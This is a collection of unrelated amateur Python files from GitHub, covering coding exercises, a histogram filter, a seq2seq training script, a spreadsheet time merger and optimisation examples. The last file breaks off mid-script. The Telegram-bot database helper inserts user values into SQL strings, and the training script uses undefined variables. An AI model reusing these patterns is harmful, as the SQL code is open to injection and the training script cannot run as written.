{"seq_id":"39833051069","text":"dct = {'person': {'in_dict': [1, 2, 3],\n\n                  'after_list': {4, '5'},\n\n                  'after_set': ('hello', )}}\n\nkey1 = []\nvalue1 = []\n\nfor i in dct.values():\n    for key, value in i.items():\n        key1.append(key)\n        value1.append(value)\n\nfor i in value1:\n    for j in i:\n        key1.append(j)\n        value1.append('')\n\nnew_dct = {key: value for key, value in zip(key1, value1)}\n\nprint(new_dct)\n","repo_name":"kopachmaksym/LogosItAcademy","sub_path":"Урок 4.py","file_name":"Урок 4.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"19686616360","text":"\"\"\"Rock Paper Scissors\n--------------------------------\n\"\"\"\n\nimport random\n\nscore_player = 0\nscore_computer = 0\noptions = ['rock', 'paper', 'scissors']\nrandom.seed(42)\n\ndef results(a,b) :\n    \"\"\"This function takes the values played by two players\n    and determines who is the winner\"\"\"\n    \n    round_winner = 0\n    \n    if a == b:\n        round_winner = 0\n    elif a + b == 5 or a + b == 3:\n        if a > b :\n            round_winner = 1\n        else :\n            round_winner = 2\n    elif a + b == 4:\n        if a < b :\n            round_winner = 1\n        else :\n            round_winner = 2\n    \n    if 
round_winner == 1:\n        print(\"You win this round\")\n    elif round_winner == 2:\n        print(\"You lose this round\")\n    else:\n        print(\"Draw\")\n\n    return round_winner\n\ndef computer_play() :\n    \"\"\"This defines what the computer plays in each round\"\"\"\n\n    value_computer = ''\n\n    # pick uniformly among the three options so scissors can come up too\n    b = random.randint(1,3)\n\n    if b == 1:\n        value_computer = 'Rock'\n    elif b == 2:\n        value_computer = 'Paper'\n    elif b == 3:\n        value_computer = 'Scissors'\n\n    print('The computer played :', value_computer)\n\n    return b \n\n## While condition\n\nwhile score_player < 3 and score_computer < 3:\n    \n    value_player = input(\"Rock, Paper, Scissors ?:\\n\").lower()\n\n    while value_player not in options:\n        value_player = input(\"Please pick from Rock, Paper, Scissors :\\n\").lower()\n    else:\n        print('You played ', value_player,' !')\n    \n    if value_player == 'rock':\n        a = 1\n    elif value_player == 'paper':\n        a = 2\n    elif value_player == 'scissors':\n        a = 3\n\n    b = computer_play()\n\n    round_winner = results(a,b)\n\n    if round_winner == 1:\n        score_player += 1\n    elif round_winner == 2:\n        score_computer += 1\n    \n    print('Your score: ',score_player,' vs. Computer score ', score_computer)\n\nif score_player == 3:\n    print('You win !!!')\nelse:\n    print('The computer wins :)')","repo_name":"abiais/projects","sub_path":"python/rock_paper_scissors.py","file_name":"rock_paper_scissors.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40403159001","text":"# suppose we have a website where users can create profiles by providing a name, an email and\n# a date of birth. We can use a decorator to help us validate the data.\n\nfrom datetime import datetime, timedelta\n\n\ndef validate_profile(func):\n    def wrapper(name, email, dob):\n        try:\n            # check that dob is in the correct format (YYYY-MM-DD)\n            dob = datetime.strptime(dob, \"%Y-%m-%d\")\n\n            # check that user is at least 18 years old\n            eighteen_years_ago = datetime.now() - timedelta(days=365 * 18)\n            if dob > eighteen_years_ago:\n                raise ValueError(\"You must be at least 18 years old to create a profile\")\n\n        except ValueError as e:\n            return str(e)\n\n        # if dob is valid call the original function with the arguments\n        return func(name, email, dob)\n\n    return wrapper\n\n\n@validate_profile\ndef create_profile(name, email, dob):\n    # code to create the user profile\n    return \"Profile created successfully\"\n\n\nresult = create_profile('Ivan Ivanov', 'ivan@gmail.com', '2012-03-21')\nprint(result)","repo_name":"GGeorgiDY/Python-OOP-Jan2023","sub_path":"17.Decorators_-_Lab/example - validate_profile.py","file_name":"example - validate_profile.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"bg","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"16169107619","text":"import openpyxl\nfrom PyQt5 import QtCore\nimport time\n\n\nclass Main(QtCore.QThread):\n    percentageChanged = QtCore.pyqtSignal(int)\n    indicator_of_end_work = QtCore.pyqtSignal(bool)\n\n    def __init__(self, nameOfOutFile, nameOfInFile, count):\n        super().__init__()\n        self.nameOfOutFile = nameOfOutFile\n        self.nameOfInFile = nameOfInFile\n        self.count = count\n        self.time = time\n\n    def run(self):\n        wbIn = openpyxl.load_workbook(filename=self.nameOfInFile)\n        sheetIn = wbIn['Sheet']\n        dataIn = sheetIn.values\n        dataIn = list(dataIn)\n\n        wbOut = openpyxl.load_workbook(filename=self.nameOfOutFile)\n        sheetOut = wbOut['Лист1']\n        dataOut = sheetOut.values\n        dataOut = list(dataOut)\n\n        for 
j in range(5):\n            self.count += 1\n            self.percentageChanged.emit(self.count)\n\n        # BUILD LISTS OF SURNAMES AND ARRIVAL/DEPARTURE TIMES\n        i = 0\n        dataNameIn = []\n        while i != sheetIn.max_row:\n            dataNameIn.append(dataIn[i][3])\n            i += 1\n        j = 0\n        dataNameOut = []\n        while j != sheetOut.max_row:\n            dataNameOut.append(dataOut[j][4] + ' ' + dataOut[j][5] + ' ' + dataOut[j][6])\n            j += 1\n\n        i = 0\n        oneSecondName = 0\n        while dataNameOut[i] == dataNameOut[i + 1]:\n            oneSecondName += 1\n            i += 1\n\n        i = 0\n        dataTimeIn = []\n        dataTimeInExit = []\n        while i != sheetIn.max_row:\n            dataTimeIn.append(dataIn[i][5])\n            dataTimeInExit.append(dataIn[i][6])\n            i += 1\n\n        j = 0\n        dataTimeOut = []\n        dataTimeOutExit = []\n        while j != sheetOut.max_row:\n            dataTimeOut.append(dataOut[j][7])\n            dataTimeOutExit.append(dataOut[j][8])\n            j += 1\n\n        for j in range(5):\n            self.count += 1\n            self.percentageChanged.emit(self.count)\n\n        print(\"Comparing arrival times\")\n        # Compare arrival times\n        for j in range(len(dataNameIn)):\n            i = 0\n            while i <= len(dataNameOut):\n                for h in range(oneSecondName):\n                    if (i + h) < len(dataNameOut):\n                        if dataNameIn[j] == dataNameOut[i + h]:\n                            tmpData = str(dataTimeIn[j])[0:2]\n                            if tmpData != \"Пр\":\n                                if dataTimeOut[i + int(tmpData) - 1] is None:\n                                    sheetOut.cell(row=i + int(tmpData), column=8).value = dataTimeIn[j]\n                                    break\n                                else:\n                                    if (str(dataTimeIn[j])[:10] == str(dataTimeOut[i + int(tmpData) - 1])[:10]) and (\n                                            str(dataTimeIn[j])[11:] < str(dataTimeOut[i + int(tmpData) - 1])[11:]):\n                                        sheetOut.cell(row=i + int(tmpData), column=8).value = dataTimeIn[j]\n                                        break\n                            else:\n                                if dataTimeOut[i + int(str(dataTimeInExit[j])[0:2]) - 1] is None:\n                                    sheetOut.cell(row=i + int(str(dataTimeInExit[j])[0:2]), column=8).value = \\\n                                        dataTimeIn[j]\n                                else:\n                                    break\n                    else:\n                        break\n                i += oneSecondName + 1\n        wbOut.save(filename=self.nameOfOutFile)\n        print(\"Arrival times have been updated!\")\n\n        for j in range(5):\n            self.count += 1\n            self.percentageChanged.emit(self.count)\n\n        # Compare departure times\n        for j in range(len(dataNameIn)):\n            i = 0\n            while i <= len(dataNameOut):\n                for h in range(oneSecondName):\n                    if (i + h) < len(dataNameOut):\n                        if dataNameIn[j] == dataNameOut[i + h]:\n                            tmpData = str(dataTimeInExit[j])[0:2]\n                            if tmpData != \"Пр\":\n                                if dataTimeOutExit[i + int(tmpData) - 1] is None:\n                                    sheetOut.cell(row=i + int(tmpData), column=9).value = dataTimeInExit[j]\n                                    break\n                                else:\n                                    if (str(dataTimeInExit[j])[:10] == str(dataTimeOutExit[i + int(tmpData) - 1])[\n                                            :10]) and (\n                                            str(dataTimeInExit[j])[11:] > str(dataTimeOutExit[i + int(tmpData) - 1])[\n                                            11:]):\n                                        sheetOut.cell(row=i + int(tmpData), column=9).value = dataTimeInExit[j]\n                                        break\n                            else:\n                                if (dataTimeOutExit[i + int(str(dataTimeIn[j][0:2])) - 1]) is None:\n                                    sheetOut.cell(row=i + int(str(dataTimeIn[j][0:2])), column=9).value = \\\n                                        dataTimeInExit[j]\n                                else:\n                                    break\n                    else:\n                        break\n                i += oneSecondName + 1\n        print(\"Departure times have been updated!\")\n        wbOut.save(filename=self.nameOfOutFile)\n\n        for j in range(5):\n            self.count += 1\n            self.percentageChanged.emit(self.count)\n\n        self.indicator = True\n        self.indicator_of_end_work.emit(self.indicator)\n","repo_name":"Sushken/skud-report-structure","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":5821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"2005265007","text":"import sqlite3 as db\n\n\ndef add_db(tgId,group):\n\n    con = db.connect('myDb.db')\n    group = group\n\n    cur = con.cursor()\n    # filter on the current user; assumes the first column of users is named tgId\n    # (the original selected every row, so any existing user made the check pass)\n    cur.execute(f\"SELECT * FROM users WHERE tgId = {tgId}\")\n    data = 
cur.fetchall()\n\n if data:\n msg = 'You are already in db, bastard'\n cur.close()\n else:\n cur.execute( f'INSERT INTO users VALUES ({tgId},\"{group}\");')\n cur.close()\n msg = 'You are added to db'\n\n con.commit()\n return msg\n","repo_name":"Furfin/FMS_BOT","sub_path":"telebot/db_controller.py","file_name":"db_controller.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"28020042675","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\n\nfrom torchtext.datasets import TranslationDataset, Multi30k\nfrom torchtext.data import Field, BucketIterator\nimport os\nimport random\nimport math\nimport time\n\nfrom functions import *\n\n# Get input_size and output(dimensionality of the one-hot vectors that will be input to the encoder/decoder.)\n# The Preprocessing steps will deliver temporal outputs for saving memory space.\nremoveEmptyParallel('en-bg.en','en-bg.bg')\nremoveDuplicateParallel('en-bg.en.noEmpty.sl','en-bg.en.noEmpty.sl')\nos.remove('en-bg.en.noEmpty.sl')\nos.remove('en-bg.bg.noEmpty.tl')\nsrc_vocab=text2vocab('en-bg.en.noEmpty.sl.noDuplicate.sl',200)\ntgt_vocab=text2vocab('en-bg.en.noEmpty.sl.noDuplicate.tl',200)\nos.remove('en-bg.en.noEmpty.sl.noDuplicate.sl')\nos.remove('en-bg.en.noEmpty.sl.noDuplicate.tl')\n\nINPUT_DIM = len(SRC.vocab)\nOUTPUT_DIM = len(TRG.vocab)\nENC_EMB_DIM = 256\nDEC_EMB_DIM = 256\nHID_DIM = 512\nN_LAYERS = 2\nENC_DROPOUT = 0.5\nDEC_DROPOUT = 0.5\n\nenc = Encoder(INPUT_DIM, ENC_EMB_DIM, HID_DIM, N_LAYERS, ENC_DROPOUT)\ndec = Decoder(OUTPUT_DIM, DEC_EMB_DIM, HID_DIM, N_LAYERS, DEC_DROPOUT)\n\nmodel = Seq2Seq(enc, dec, device).to(device)\n\n# Prepare train, val and test sets\n\n\n\n# Initialize weights in PyTorch by creating a function\n\ndef init_weights(m):\n for name, param in m.named_parameters():\n nn.init.uniform_(param.data, -0.08, 0.08)\n\nmodel.apply(init_weights)\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\nprint(f'The model has {count_parameters(model):,} trainable parameters')\n\noptimizer=optim.Adam(model.parameters())\n\n# PAD_IDX=TRG.vocab.stoi['']\ncriterion=nn.CrossEntropyLoss(ignore_index=PAD_IDX)\n\ndef train(model, iterator, optimizer, criterion, clip ):\n model.train()\n epoch_loss=0\n for i, batch in enumerate(iterator):\n src=batch.src\n trg=batch.trg\n\n optimizer.zero_grad()\n output=model(src, trg)\n\n # trg = [trg sent len, batch size]\n # output = [trg sent len, batch size, output dim]\n\n output = output[1:].view(-1, output.shape[-1])\n trg = trg[1:].view(-1)\n\n # trg = [(trg sent len - 1) * batch size]\n # output = [(trg sent len - 1) * batch size, output dim]\n\n loss=criterion(output, trg)\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), clip)\n\n optimizer.step()\n epoch_loss += loss.item()\n\n return epoch_loss / len(iterator)\n\n\n\n","repo_name":"hanjingyi/seq2seq_attention_pytorch","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12136832583","text":"import numpy as np\n\nfilename = \"./Python/1D3Z_mod1.pdb\"\nnew_filename = \"./Python/coordinates_H.txt\"\n\narr = np.genfromtxt(filename, dtype='str')\n\narr = arr[:, 5:8].astype(np.float)\n\nnp.savetxt(new_filename, 
arr)\n","repo_name":"ehb54/nmrsuite","sub_path":"sassie_modifications/analyze/pre/From_Matthew/PRE_first/coordinates_H_create.py","file_name":"coordinates_H_create.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"1240393192","text":"import numpy as np\nfrom collections import Counter\nfrom matplotlib import pyplot as plt\n\n\n## Room observation likelihood\ndef get_room_observation_likelihood(N=33, doors=np.array([4, 11, 26]),\\\n pulse=np.array([0.2, 0.8, 1, 0.8, 0.2]), noise=0.05):\n uniform = np.zeros(N)\n uniform[doors-1] = 1\n unnormalized = np.roll(convolve(uniform, pulse), -int((len(pulse)-1)/2))\n unnormalized[unnormalized == 0] = noise\n likelihood = {}\n likelihood['door'] = unnormalized\n likelihood['wall'] = 1-unnormalized\n return likelihood\n\n## Additive noise functions\ndef get_gaussian_distribution(N=21, loc=1, scale=2):\n center = int(int(N+1)/2)\n x = np.linspace(1, N, N)\n x = x - center\n sigma = scale*2\n pdf = np.exp(-x*x/(2*sigma))\n n = center - loc\n return np.roll(pdf/pdf.sum(), -n)\n\ndef get_rayleigh_distribution(N=21, loc=1, scale=2):\n center = int(int(N+1)/2)\n x = np.linspace(1, N, N)\n sigma = scale*4\n x = x - center + np.sqrt(sigma)\n pdf = (x >= 0)*(x*np.exp(-x*x/(2*sigma))/sigma)\n n = center - loc\n return np.roll(pdf/pdf.sum(), -n)\n\ndef get_exponential_distribution_symetric(N=21, loc=1, scale=2):\n indexes = np.linspace(1, N, N)\n center = int(int(len(indexes)+1)/2)\n exponential_dist = np.exp(-abs(indexes-center)/scale)\n exponential_dist = exponential_dist/exponential_dist.sum()\n n = center - loc\n return np.roll(exponential_dist, -n)\n\ndef get_exponential_distribution(N=21, loc=1, scale=2, mirror=False):\n indexes = np.linspace(1, N, N)\n exponential_dist = np.exp(-abs(indexes)/scale)\n exponential_dist = exponential_dist/exponential_dist.sum()\n if mirror:\n return np.roll(exponential_dist[::-1], loc)\n return np.roll(exponential_dist, loc-1)\n\n## Walking functions\ndef get_walking_noise_example_1(N):\n W = np.zeros(N)\n W[0] = 0.15\n W[1] = 0.50\n W[2] = 0.35\n return W\n\ndef get_walking_noise_example_2(N):\n W = np.zeros(N)\n W[0] = 0.15\n W[1] = 0.70\n W[2] = 0.15\n return W\n\ndef get_walking_noise_perfect_1(N):\n W = np.zeros(N)\n W[1] = 1\n return W\n\ndef get_walking_noise_perfect_3(N):\n W = np.zeros(N)\n W[3] = 1\n return W\n\n## Generative functions\ndef get_random_sample(random_variable):\n pick_random = np.random.uniform()\n sum_prob = 0\n i = 0\n while sum_prob < pick_random:\n sum_prob = sum_prob + random_variable[i][1]\n i = i + 1\n return random_variable[i-1][0]\n\n\ndef generate_sample(likelihood, W, initial_state=1, steps=37):\n current_state = initial_state-1\n sample = []\n measurements = []\n probs = W[W > 0]\n idxs = np.where([W > 0])[1]\n random_step = [(idxs[i], p) for i, p in enumerate(probs)]\n\n random_step_list = []\n real_locations = []\n N = len(likelihood[list(likelihood.keys())[0]])\n sample_stats = [None for i in range(N)]\n for step in range(steps):\n random_variable = []\n for key in likelihood.keys():\n random_variable.append((key, likelihood[key][current_state]))\n\n measure = get_random_sample(random_variable)\n measurements.append(measure)\n sample.append([current_state, measure])\n real_locations.append(current_state)\n if sample_stats[current_state] is None:\n sample_stats[current_state] = {}\n if measure not in sample_stats[current_state]:\n sample_stats[current_state][measure] = 0\n 
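# count how often each observation is seen at this state (empirical emission frequencies)\n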
sample_stats[current_state][measure] = sample_stats[current_state][measure] + 1\n\n random_step_done = get_random_sample(random_step)\n random_step_list.append(random_step_done)\n current_state = (current_state + random_step_done) % N\n \n transition_hist = Counter(random_step_list)\n steps_stats = []\n for i in range(len(W)):\n if i in transition_hist:\n steps_stats.append(transition_hist[i]/steps)\n else:\n steps_stats.append(0)\n #steps_stats = [transition_hist[i]/steps for i in range(len(transition_hist))]\n return measurements, sample_stats, steps_stats, real_locations\n\n## Histogram filter functions\n\ndef convolve(x1, x2):\n conv = np.zeros(len(x1))\n for i in range(len(x2)):\n conv = conv + x2[i]*np.roll(x1, i)\n return conv\n\ndef update(p, X, likelihood):\n # p: prior probability\n # X: Measurement. Measured position\n # posterior not normalized\n posterior = likelihood[X]*p\n # Normalize it\n normalized = posterior/posterior.sum()\n return normalized\n\ndef prediction(posterior, transition):\n # posterior: posterior probability distribution\n # transition: transition probability distribution\n return convolve(posterior, transition)\n\ndef get_hist_circular_mean_var(hist, zero_centered=True):\n N = len(hist)\n idx = np.linspace(1, N, N)\n x = np.linspace(0, 2*np.pi*(N-1)/N, N)\n x_cos = np.cos(x)\n x_sin = np.sin(x)\n mean_cos = (hist*x_cos).sum()\n mean_sin = (hist*x_sin).sum()\n mean_angle = np.arctan2(mean_sin, mean_cos)\n mean = N*mean_angle/(2*np.pi)\n if mean < 0:\n mean = mean + N\n mean = mean + 1\n deltas = abs(idx - mean)\n deltas[deltas > (N/2.0)] = deltas[deltas > (N/2.0)]-N\n variance = (hist*(deltas**2)).sum()\n if zero_centered:\n if mean > N/2:\n mean = mean - N\n return mean, variance\n\ndef run_histogram_filter(W, measurements, likelihood, prior):\n N = len(prior)\n mean, variance = get_hist_circular_mean_var(prior)\n mean_list = [mean]\n var_list = [variance]\n mean_list_pred = [mean]\n var_list_pred = [variance]\n N_mult = 1\n N_mult_pred = 1\n for i in range(len(measurements)):\n posterior = update(prior, measurements[i], likelihood)\n mean, variance = get_hist_circular_mean_var(posterior)\n predicted = convolve(posterior, W)\n prior = predicted\n mean_pred, variance_pred = get_hist_circular_mean_var(prior)\n\n if len(mean_list) > 1:\n while abs(mean_list[-1]-mean) > (N/2):\n #print(abs(mean_list[-1]-mean), mean)\n mean = mean + N_mult*N\n\n if len(mean_list_pred) > 1:\n while abs(mean_list_pred[-1]-mean_pred) > (N/2):\n mean_pred = mean_pred + N_mult_pred*N\n\n mean_list.append(mean)\n var_list.append(variance)\n mean_list_pred.append(mean_pred)\n var_list_pred.append(variance_pred)\n return posterior, mean_list, var_list, mean_list_pred, var_list_pred\n\n## Ploting functions\ndef plot_estimations(mean_list, var_list, mean_list_pred, var_list_pred, fr=0, to=-1):\n if to < 0:\n to = len(mean_list)\n plt.plot(mean_list[fr:to], color='b')\n mean_list_pred_1 = np.array(mean_list_pred)-1\n plt.plot((mean_list_pred_1)[fr:to], color='r')\n plt.plot((mean_list+np.sqrt(var_list))[fr:to], color='g')\n plt.plot((mean_list-np.sqrt(var_list))[fr:to], color='g')\n plt.plot((mean_list_pred_1+np.sqrt(var_list_pred))[fr:to], color='y')\n plt.plot((mean_list_pred_1-np.sqrt(var_list_pred))[fr:to], color='y')\n plt.show()\n\ndef plot_distribution(data, title='', fig=None, color='b', str_indexes=None, rotation=0, mark=None):\n N = len(data)\n indexes = np.linspace(1, N, N)\n if fig is None:\n fig, ax = plt.subplots(figsize=(20, 3))\n width = 1/1.5\n plt.bar(indexes, data, 
width=width, color=color)\n plt.xticks(rotation=rotation)\n if not str_indexes == -1:\n if str_indexes is None:\n plt.xticks(indexes)\n else:\n plt.xticks(indexes, str_indexes)\n plt.title(title)\n if mark is not None:\n plt.bar(mark, data[mark-1], width=width, color='r')\n\nfrom ipywidgets import *\nfrom scipy.stats import entropy\n\ndef histogram_filter(W, measurements, likelihood, prior):\n # W: transition probability distribution\n # measurements: It is a list of observations. The i'th observation Xi = measurements[i]\n # likelihood: It is a dict where likelihood[Xi] is the likelihood given observation Xi\n # prior: The initial distribution, normaly with normalized entropy of 1 (Maximun confusion)\n normalized_entropy = []\n mean_array = []\n var_array = []\n for i in range(len(measurements)):\n posterior = update(prior, measurements[i], likelihood)\n normalized_entropy.append(entropy(posterior, base=2)/np.log2(len(prior)))\n mean, variance = get_hist_circular_mean_var(posterior)\n mean_array.append(mean)\n var_array.append(variance)\n predicted = prediction(posterior, W)\n prior = predicted\n return posterior, predicted, normalized_entropy, mean_array, var_array\n\nimport matplotlib.patches as mpatches\ndef plot_histogram_entropy_std(measurements, transition, likelihood, prior, n_steps=1, real_positions=None): \n N = len(prior)\n posterior, predicted, normalized_entropy, mean_array, var_array\\\n = histogram_filter(transition,\n measurements[:n_steps],\n likelihood,\n prior=np.ones(N)/N)\n f = plt.figure(figsize=(20, 10))\n plt.subplot(3, 1, 1)\n plot_distribution(posterior, title='normalized $P(S=k|X)$ - Posterior -', fig=f)\n #plt.show()\n #plt.figure(figsize=(20,5))\n plt.subplot(3, 2, 3)\n plt.title(\"Normalized entropy\")\n plt.plot(normalized_entropy)\n plt.subplot(3, 2, 4)\n plt.title(\"Standard deviation\")\n plt.plot(np.array(var_array)**(0.5))\n if (real_positions is not None) and (type(measurements[0]) is not int):\n real_positions = real_positions[:n_steps]\n plt.subplot(3, 1, 3)\n measurements_options = list(set(measurements[:n_steps]))\n color = ['r','b','g','y','k']\n map_dict = {}\n for i,meas in enumerate(measurements_options):\n map_dict[meas] = color[i]\n for i, measurement in enumerate(measurements[:n_steps]):\n plt.scatter(i, real_positions[i], color=map_dict[measurement], label=measurement)\n plt.plot(real_positions)\n class_colours = color[:len(measurements_options)]\n recs = []\n for i in range(0,len(class_colours)):\n recs.append(mpatches.Rectangle((0,0),1,1,fc=class_colours[i]))\n plt.legend(recs,measurements_options,loc=4)\n plt.xlabel('iteration')\n plt.ylabel('Robot position')\n elif (real_positions is not None):\n plt.subplot(3, 1, 3)\n plt.plot(measurements[:n_steps], label=\"Robot location measured\")\n plt.plot(real_positions[:n_steps], label=\"Robot real location\")\n plt.xlabel('iteration')\n plt.ylabel('Robot position')\n plt.legend()\n\n plt.show()\n print(\"normalized entropy of last posterior:\", normalized_entropy[-1])\n\n\ndef plot_interactive_histogram(measurements, transition, likelihood, prior, steps, real_locations=None, initial_slider_pos=10):\n plot_histogram_result_interactive = lambda n_steps=initial_slider_pos: plot_histogram_entropy_std(measurements, transition, \n likelihood, prior,\n n_steps, real_positions = real_locations) \n\n interact(plot_histogram_result_interactive, n_steps = widgets.IntSlider(min=1, max=steps,\n step=1, value=initial_slider_pos,\n continuous_update=False))\n\n\ndef get_likelihood(N, observation_func, 
scale=6):\n likelihood = {}\n for X_0 in range(N):\n X = X_0 + 1\n likelihood[X] = []\n for k in range(N):\n likelihood_k = observation_func(N= N, loc = k+1, scale=scale)\n likelihood[X].append(likelihood_k[X-1])\n return likelihood\n","repo_name":"husmen/racecar-training","sub_path":"LAB9 - kalman and histogram filters/histogram_filters.py","file_name":"histogram_filters.py","file_ext":"py","file_size_in_byte":11852,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"14182359879","text":"import logging\n\n__author__ = \"Artur Barseghyan \"\n__copyright__ = \"2016-2022 Artur Barseghyan\"\n__license__ = \"GPL-2.0-only OR LGPL-2.1-or-later\"\n__all__ = (\n \"app_setup\",\n \"is_app_setup_completed\",\n \"LOG_INFO\",\n \"log_info\",\n \"mark_app_setup_as_completed\",\n \"skip\",\n)\n\n\nLOGGER = logging.getLogger(__name__)\n\nLOG_INFO = True\n\n\ndef log_info(func):\n \"\"\"Log some useful info.\"\"\"\n if not LOG_INFO:\n return func\n\n def inner(self, *args, **kwargs):\n \"\"\"Inner.\"\"\"\n result = func(self, *args, **kwargs)\n\n LOGGER.info(\"\\n%s\", func.__name__)\n LOGGER.info(\"============================\")\n if func.__doc__:\n LOGGER.info('\"\"\" %s \"\"\"', func.__doc__.strip())\n LOGGER.info(\"----------------------------\")\n if result is not None:\n LOGGER.info(result)\n LOGGER.info(\"\\n\")\n\n return result\n\n return inner\n\n\nSKIP = False\n\n\ndef skip(func):\n \"\"\"Simply skip the test.\"\"\"\n\n def inner(self, *args, **kwargs):\n \"\"\"Inner.\"\"\"\n if SKIP:\n return\n return func(self, *args, **kwargs)\n\n return inner\n\n\nclass AppSetup(object):\n \"\"\"Basic setup class.\n\n Created in order to avoid the app test data to be initialised\n multiple times.\n \"\"\"\n\n def __init__(self):\n self.is_done = False\n\n\napp_setup = AppSetup()\n\n\ndef is_app_setup_completed():\n \"\"\"Check if app setup is completed.\"\"\"\n return app_setup.is_done is True\n\n\ndef mark_app_setup_as_completed():\n \"\"\"Mark app setup as completed.\"\"\"\n app_setup.is_done = True\n","repo_name":"barseghyanartur/django-debug-toolbar-force","sub_path":"src/debug_toolbar_force/tests/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"72"} +{"seq_id":"20828636842","text":"import osqp\nimport numpy as np\nfrom scipy import sparse\nimport matplotlib.pyplot as plt\nimport casadi as ca\n\n# 1st exercise\n# ========= OSQP ===========\n\nm = 1\n\n# Define problem data\nP = sparse.csc_matrix([[2, 0], [0, 2]])\nq = np.array([0, 1])\n\n\n# Create an OSQP object\nprob = osqp.OSQP()\n# Setup workspace\nprob.setup(P, q)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 2)\nx1 = x[0]\nx2 = x[1]\nm=1\n\nf = x1**2 + x2**2 + m*x2\n\n# construct nlp\nnlp = {'x': x, 'f': f}\nsolver = ca.nlpsol('solver', 'ipopt', nlp)\nsol = solver()\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n\n# 2nd exercise\n# ===============================\n\nimport osqp\nimport numpy as np\nfrom scipy import sparse\n\n# Define problem data\nP = sparse.csc_matrix([[8, 0, 0], [0, 4, 0], [0, 0, 3]])\nq = np.array([1, 1, 0])\n#A = sparse.csc_matrix([[1, 1], [1, 0], [0, 1]])\n#l = np.array([1, 0, 0])\n#u = np.array([1, 0.7, 
0.7])\n\n# Create an OSQP object\nprob = osqp.OSQP()\n\n# Setup workspace and change alpha parameter\nprob.setup(P, q, alpha=1.0)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 3)\nx1 = x[0]\nx2 = x[1]\nx3 = x[2]\n\nf = 4*x1**2 + 2*x2**2 + x1 + x2 + x3**2\n\n# construct nlp\nnlp = {'x': x, 'f': f}\nsolver = ca.nlpsol('solver', 'ipopt', nlp)\nsol = solver()\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n# ==============================\n\n# 2nd exercise (constrained)\n# ===============================\n\nimport osqp\nimport numpy as np\nfrom scipy import sparse\n\n# Define problem data\nP = sparse.csc_matrix([[8, 0, 0], [0, 4, 0], [0, 0, 3]])\nq = np.array([1, 1, 0])\nA = sparse.csc_matrix([[1, 1, 0], [1, 0, 0], [0, 0, 1]])\nl = np.array([1, 0, 1])\nu = np.array([1, 2, 3])\n\n# Create an OSQP object\nprob = osqp.OSQP()\n\n# Setup workspace and change alpha parameter\nprob.setup(P, q, A, l, u, alpha=1.0)\n\n# Solve problem\nres = prob.solve()\n\nprint(res.x)\n\n\n# ========= casadi ===========\n\nimport casadi as ca\n\nx = ca.SX.sym('x', 3)\nx1 = x[0]\nx2 = x[1]\nx3 = x[2]\n\nf = 4*x1**2 + 2*x2**2 + x1 + x2 + x3**2\n\ng = []\ng.append(x1 + x2) # linear constrain\ng.append(x1) # second-order cone\ng.append(x3) # rotated second-order cone\n\nx0 = np.array([0, 0, 0])\nlbg = np.array([1, 0, 1])\nubg = np.array([1, 2, 3])\n\n# construct nlp\nnlp = {'x': x, 'f': f, 'g': ca.vertcat(*g)}\nsolver = ca.nlpsol('solver', 'ipopt', nlp, )\nsol = solver(x0=x0, lbg=lbg, ubg=ubg)\n\n# print solutions\nprint(\"\\n ----- SOCP solution\")\nprint(\"> success =\" , solver.stats()['success'])\nprint(\"> primal solution =\" , sol['x'])\nprint(\"> objective at solution =\", sol['f'])\n\n\n\n#%% ===========================================================================\n# Solve Rosenbrock (unconstrained)\n# =============================================================================\n# Plot non linear function ----------------------------------------------------\n[X0,X1] = np.meshgrid(np.linspace(-3.,3.,1000), np.linspace(-3.,3.,1000))\nF = np.exp(-X0**2 - X1**2) * np.sin(4 * (X0 + X1 + X0*X1**2))\n\n# Plot the function\nplt.clf()\nplt.contour(X0,X1,F)\nplt.colorbar()\nplt.jet()\nplt.xlabel(\"x0\")\nplt.ylabel(\"x1\")\nplt.ylim([-3,3])\nplt.xlim([-3,3])\n\n# define problem\nx = ca.SX.sym('x',2)\nf = ca.exp(-x[0]**2 - x[1]**2 ) * ca.sin(4*(x[0] + x[1] + x[0]*x[1]**2 ))\n\n# construct nlp\nnlp = {'x': x,'f': f}\nsolver = ca.nlpsol(\"solver\", 'ipopt', nlp)\n\n# Gradient of f\nF_grad = ca.Function('f', [x], [ca.gradient(f, x)], ['x'], ['gradient'])\nprint(F_grad)\n\n## Solve for three different starting points\nsummary = [(\"GUESS\", \"SOLUTION\", 